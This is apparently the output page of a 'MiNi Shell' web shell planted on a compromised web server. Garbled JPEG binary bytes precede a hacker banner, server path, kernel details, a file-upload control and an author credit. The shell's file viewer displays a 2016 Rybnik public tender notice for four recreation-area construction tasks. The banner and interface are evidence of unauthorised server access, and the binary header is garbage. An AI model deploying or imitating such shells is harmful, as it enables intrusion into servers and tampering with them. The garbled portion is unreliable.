JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160412/38355-N-2016.html

<p class="kh_header"><b>Rybnik: Zagospodarowanie terenów rekreacyjnych w dzielnicach Rybnika realizowane 
w ramach budżetu obywatelskiego 2016 w systemie zaprojektuj i wybuduj 
zad. 1 Maroko-Nowiny;kulturalnie i sportowo-kontynuacja zagospodarowania terenów zielonych przy ul.Góreckiego.
zad. 2 Zamysłów;rozbudowa infrastruktury zaplecza rekreacyjno-wypoczynkowego Rajzapunkt przy ul.Pełczyńskiego. 
zad. 3 Zebrzydowice;zagospodarowanie placu przyszkolnego na terenie ZSP12 poprzez montaż mini siłowni 
zad. 4 Ligota-Ligocka Kuźnia;budowa altany z grillem oraz wyposażeniem na potrzeby organizacji spotkań</b><br>
<b>Numer ogłoszenia: 38355 - 2016; data zamieszczenia: 12.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Rybnik , ul. B. Chrobrego 2, 44-200 Rybnik, woj. śląskie, tel. 032 4223011, faks 032 4224124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rybnik.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie terenów rekreacyjnych w dzielnicach Rybnika realizowane 
w ramach budżetu obywatelskiego 2016 w systemie zaprojektuj i wybuduj 
zad. 1 Maroko-Nowiny;kulturalnie i sportowo-kontynuacja zagospodarowania terenów zielonych przy ul.Góreckiego.
zad. 2 Zamysłów;rozbudowa infrastruktury zaplecza rekreacyjno-wypoczynkowego Rajzapunkt przy ul.Pełczyńskiego. 
zad. 3 Zebrzydowice;zagospodarowanie placu przyszkolnego na terenie ZSP12 poprzez montaż mini siłowni 
zad. 4 Ligota-Ligocka Kuźnia;budowa altany z grillem oraz wyposażeniem na potrzeby organizacji spotkań.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie terenów rekreacyjnych w dzielnicach Miasta Rybnika realizowane w ramach budżetu obywatelskiego 2016 w systemie zaprojektuj i wybuduj
z podziałem na zadania:
zad. 1	Dzielnica Maroko-Nowiny; kulturalnie i sportowo - kontynuacja zagospodarowania terenów zielonych przy ul. H. M. Góreckiego.
Zakres robót:
a) 	opracowanie (na podkładzie mapowym dostarczonym przez Zamawiającego) projektu zagospodarowania terenu obejmującego:
-	rozbudowę istniejącego placu zabaw o dodatkowe urządzenia (wraz z nawierzchnią bezpieczną i ogrodzeniem),
-	rozbudowę istniejącej siłowni terenowej o dodatkowe urządzenia,
-	rozbudowę istniejącej ścieżki do jazdy na rolkach i wrotkach,
-	rozbudowę instalacji oświetlenia terenu,
-	budowę zjazdu linowego dla dzieci starszych,
-	budowę boiska do siatkówki,
-	wykonanie nawierzchni utwardzonych (stanowiska do ćwiczeń, dojścia),  
b)	uzyskanie dla przyjętego rozwiązania projektowego akceptacji wnioskodawcy projekt obywatelskiego,
c) 	realizacja robót zgodnie z zatwierdzonym projektem,
d) 	opracowanie geodezyjnej inwentaryzacji powykonawczej.

zad. 2	Dzielnica Zamysłów; rozbudowa infrastruktury zaplecza rekreacyjno-wypoczynkowego Rajzapunkt przy ul. W. Pełczyńskiego. 
Zakres robót:
a) 	opracowanie (na podkładzie mapowym dostarczonym przez Zamawiającego) projektu  zagospodarowania terenu obejmującego:
-	wykonanie nawierzchni utwardzonej w formie przejścia pomiędzy ul. Pełczyńskiego (od Rajzapunktu) a przepompownią ,
-	wykonanie nawierzchni utwardzonej placu performance,
-	ukształtowanie nawierzchni w sposób umożliwiający jej łatwe odwodnienie,
-	wyposażenie terenu w elementy małej architektury (ławki i kosze na śmieci),
b)	uzyskanie dla przyjętego rozwiązania projektowego akceptacji wnioskodawcy projektu obywatelskiego,
c) 	realizacja robót zgodnie z zatwierdzonym projektem,
d) 	opracowanie geodezyjnej inwentaryzacji powykonawczej.

zad. 3	Dzielnica Zebrzydowice; zagospodarowanie placu przyszkolnego na terenie Zespołu Szkolno-Przedszkolnego nr 12 poprzez montaż mini siłowni na wolnym powietrzu dla mieszkańców dzielnicy Zebrzydowice.
Zakres robót:
a) 	opracowanie (na podkładzie mapowym dostarczonym przez Zamawiającego) projektu zagospodarowania terenu obejmującego:
-	utwardzenie brukiem betonowym stanowisk do montażu urządzeń siłowni terenowej,
-	montaż urządzeń siłowni terenowej, 
-	instalację regulaminu,	 
b)	uzyskanie dla przyjętego rozwiązania projektowego akceptacji wnioskodawcy projektu obywatelskiego,
c) 	realizacja robót zgodnie z zatwierdzonym projektem,
d) 	opracowanie geodezyjnej inwentaryzacji powykonawczej.

zad. 4	Dzielnica Ligota-Ligocka Kuźnia; budowa altany z grillem oraz wyposażeniem na potrzeby organizacji spotkań kulturalnych i integracyjnych.
Zakres robót:
a) 	opracowanie (na podkładzie mapowym dostarczonym przez Zamawiającego) projektu  zagospodarowania terenu obejmującego:
-	budowę altany drewnianej,
-	wykonanie nawierzchni utwardzonej z bruku betonowego pod i przed altaną,
-	wyposażenie altany w elementy małej architektury (grill betonowy, ławy i stoły drewniane),
b)	uzyskanie dla przyjętego rozwiązania projektowego akceptacji wnioskodawcy projektu obywatelskiego,
c) 	realizacja robót zgodnie z zatwierdzonym projektem,
d) 	opracowanie geodezyjnej inwentaryzacji powykonawczej.

Szczegółowy zakres prac precyzują: SIWZ oraz program funkcjonalno-użytkowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.20-8, 71.32.00.00-7, 45.23.32.00-1, 45.31.00.00-3, 37.44.00.00-4, 37.53.52.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zadanie 1) 4.500 PLN (cztery tysiące pięćset PLN)
Zadanie 2) 1.500 PLN (tysiąc pięćset PLN)
Zadanie 3) nie wymagane
Zadanie 4) nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla zadania nr 1:
Wykonawca wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej 3 roboty 
w zakresie zagospodarowania i wyposażenia terenów rekreacyjnych bądź sportowych, każda z nich 
o wartości co najmniej 100.000,00 zł brutto.
Dla zadania nr 2:
Wykonawca wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej 2 roboty 
w zakresie nawierzchni utwardzonych, każda z nich o wartości co najmniej 35.000,00 zł brutto.
Dla zadania nr 3: - Zamawiający nie ustanawia szczegółowych warunków 
Dla zadania nr 4:
Wykonawca wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej 2 roboty 
polegające na budowie lub rozbudowie placów zabaw, altan lub siłowni terenowych, każda z nich 
o wartości co najmniej 25.000 zł brutto.

W przypadku inwestycji, których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia inwestycji (w przypadku inwestycji rozliczanych wyłącznie w walutach innych niż PLN).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty.
Oświadczenia i dokumenty opisane w rozdziale V SIWZ.
Pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin realizacji - 10</li>
<li>3 - Gwarancja - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość przedłużenie terminu realizacji umowy w przypadku zgłoszenia przez organ administracji budowlanej sprzeciwu w trybie art. 30 ust. 5 ustawy Prawo budowlane z przyczyn, których nie można było przewidzieć w chwili składania formularza zgłoszeniowego, termin realizacji ulega zmianie o ilość dni niezbędnych do usunięcia przyczyny sprzeciwu organu.
2.	Podstawą przedłużenia terminu umownego jest zgłoszenie braku możliwości prowadzenia robót budowlanych przez Wykonawcę ze wskazaniem przyczyny potwierdzonej każdorazowo przez Zamawiającego w formie pisemnej. Przedłużenie terminu nastąpi w oparciu o aneks do umowy. Podstawą sporządzenia aneksu do umowy będzie wniosek Wykonawcy, w którym Zamawiający potwierdzi okres niemożliwości prowadzenia robót na podstawie okoliczności opisanej w ust. 1.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.um.rybnik.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Rybnika, ul. Bolesława Chrobrego 2, Wydział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2016 godzina 09:30, miejsce: Urząd Miasta Rybnika, ul. Bolesława Chrobrego 2, pok. 302.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> TERMIN REALIZACJI ZAMÓWIENIA: 
Zadanie 1 ) do 112 dni od daty zawarcia umowy, w tym:
-	opracowanie koncepcji do 14 dni od daty zawarcia umowy,
-	opracowanie projektu zagospodarowania terenu do 35 dni od daty podpisania umowy
-	zgłoszenie przez Zamawiającego wykonania robót budowlanych na podstawie art. 30 ust.1 pkt 4 ustawy Prawo budowlane - w ciągu 1 dnia od daty przekazania projektu,
-	rozpoczęcie robót - do 67 dni od daty zawarcia umowy,
-	zakończenie robót - do 112 dni od daty zawarcia umowy. 
Zadanie 2, 3 i 4 ) do 98 dni od daty zawarcia umowy, w tym:
-	opracowanie koncepcji do 14 dni od daty zawarcia umowy,
-	opracowanie projektu zagospodarowania terenu do 28 dni od daty podpisania umowy
-	zgłoszenie przez Zamawiającego wykonania robót budowlanych na podstawie art. 30 ust.1 pkt 4 ustawy Prawo budowlane - w ciągu 1 dnia od daty przekazania projektu,
-	rozpoczęcie robót - do 60 dni od daty zawarcia umowy,
-	zakończenie robót - do 98 dni od daty zawarcia umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dzielnica Maroko-Nowiny; kulturalnie i sportowo - kontynuacja zagospodarowania terenów zielonych przy ul. H. M. Góreckiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie terenów rekreacyjnych w dzielnicach Miasta Rybnika realizowane w ramach budżetu obywatelskiego 2016 w systemie zaprojektuj i wybuduj
Dzielnica Maroko-Nowiny; kulturalnie i sportowo - kontynuacja zagospodarowania terenów zielonych przy ul. H. M. Góreckiego.
Zakres robót:
a) opracowanie (na podkładzie mapowym dostarczonym przez Zamawiającego) projektu zagospodarowania terenu obejmującego:
- rozbudowę istniejącego placu zabaw o dodatkowe urządzenia (wraz z nawierzchnią bezpieczną i ogrodzeniem),
- rozbudowę istniejącej siłowni terenowej o dodatkowe urządzenia,
- rozbudowę istniejącej ścieżki do jazdy na rolkach i wrotkach,
- rozbudowę instalacji oświetlenia terenu,
- budowę zjazdu linowego dla dzieci starszych,
- budowę boiska do siatkówki,
- wykonanie nawierzchni utwardzonych (stanowiska do ćwiczeń, dojścia),  
b)	uzyskanie dla przyjętego rozwiązania projektowego akceptacji wnioskodawcy projekt obywatelskiego,
c) 	realizacja robót zgodnie z zatwierdzonym projektem,
d) 	opracowanie geodezyjnej inwentaryzacji powykonawczej.

Szczegółowy zakres prac precyzują: SIWZ oraz program funkcjonalno-użytkowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.20-8, 71.32.00.00-7, 45.23.32.00-1, 45.31.00.00-3, 37.44.00.00-4, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 112.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin realizacji - 10</li>
<li>3. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dzielnica Zamysłów; rozbudowa infrastruktury zaplecza rekreacyjno-wypoczynkowego Rajzapunkt przy ul. W. Pełczyńskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie terenów rekreacyjnych w dzielnicach Miasta Rybnika realizowane w ramach budżetu obywatelskiego 2016 w systemie zaprojektuj i wybuduj
Dzielnica Zamysłów; rozbudowa infrastruktury zaplecza rekreacyjno-wypoczynkowego Rajzapunkt przy ul. W. Pełczyńskiego. 
Zakres robót:
a) 	opracowanie (na podkładzie mapowym dostarczonym przez Zamawiającego) projektu  zagospodarowania terenu obejmującego:
-	wykonanie nawierzchni utwardzonej w formie przejścia pomiędzy ul. Pełczyńskiego (od Rajzapunktu) a przepompownią,
-	wykonanie nawierzchni utwardzonej placu performance,
-	ukształtowanie nawierzchni w sposób umożliwiający jej łatwe odwodnienie,
-	wyposażenie terenu w elementy małej architektury (ławki i kosze na śmieci),
b)	uzyskanie dla przyjętego rozwiązania projektowego akceptacji wnioskodawcy projektu obywatelskiego,
c) 	realizacja robót zgodnie z zatwierdzonym projektem,
d) 	opracowanie geodezyjnej inwentaryzacji powykonawczej.

Szczegółowy zakres prac precyzują: SIWZ oraz program funkcjonalno-użytkowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.20-8, 71.32.00.00-7, 45.23.32.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 98.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin realizacji - 10</li>
<li>3. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dzielnica Zebrzydowice; zagospodarowanie placu przyszkolnego na terenie Zespołu Szkolno-Przedszkolnego nr 12 poprzez montaż mini siłowni na wolnym powietrzu dla mieszkańców dzielnicy Zebrzydowice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie terenów rekreacyjnych w dzielnicach Miasta Rybnika realizowane w ramach budżetu obywatelskiego 2016 w systemie zaprojektuj i wybuduj
Dzielnica Zebrzydowice; zagospodarowanie placu przyszkolnego na terenie Zespołu Szkolno-Przedszkolnego nr 12 poprzez montaż mini siłowni na wolnym powietrzu dla mieszkańców dzielnicy Zebrzydowice.
Zakres robót:
a) 	opracowanie (na podkładzie mapowym dostarczonym przez Zamawiającego) projektu zagospodarowania terenu obejmującego:
-	utwardzenie brukiem betonowym stanowisk do montażu urządzeń siłowni terenowej,
-	montaż urządzeń siłowni terenowej, 
-	instalację regulaminu,	 
b)	uzyskanie dla przyjętego rozwiązania projektowego akceptacji wnioskodawcy projektu obywatelskiego,
c) 	realizacja robót zgodnie z zatwierdzonym projektem,
d) 	opracowanie geodezyjnej inwentaryzacji powykonawczej.

Szczegółowy zakres prac precyzują: SIWZ oraz program funkcjonalno-użytkowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.20-8, 71.32.00.00-7, 45.23.32.00-1, 37.44.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 98.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin realizacji - 10</li>
<li>3. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dzielnica Ligota-Ligocka Kuźnia; budowa altany z grillem oraz wyposażeniem na potrzeby organizacji spotkań kulturalnych i integracyjnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie terenów rekreacyjnych w dzielnicach Miasta Rybnika realizowane w ramach budżetu obywatelskiego 2016 w systemie zaprojektuj i wybuduj
Dzielnica Ligota-Ligocka Kuźnia; budowa altany z grillem oraz wyposażeniem na potrzeby organizacji spotkań kulturalnych i integracyjnych.
Zakres robót:
a) 	opracowanie (na podkładzie mapowym dostarczonym przez Zamawiającego) projektu  zagospodarowania terenu obejmującego:
-	budowę altany drewnianej,
-	wykonanie nawierzchni utwardzonej z bruku betonowego pod i przed altaną,
-	wyposażenie altany w elementy małej architektury (grill betonowy, ławy i stoły drewniane),
b)	uzyskanie dla przyjętego rozwiązania projektowego akceptacji wnioskodawcy projektu obywatelskiego,
c) 	realizacja robót zgodnie z zatwierdzonym projektem,
d) 	opracowanie geodezyjnej inwentaryzacji powykonawczej.

Szczegółowy zakres prac precyzują: SIWZ oraz program funkcjonalno-użytkowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.20-8, 71.32.00.00-7, 45.23.32.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 98.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin realizacji - 10</li>
<li>3. Gwarancja - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com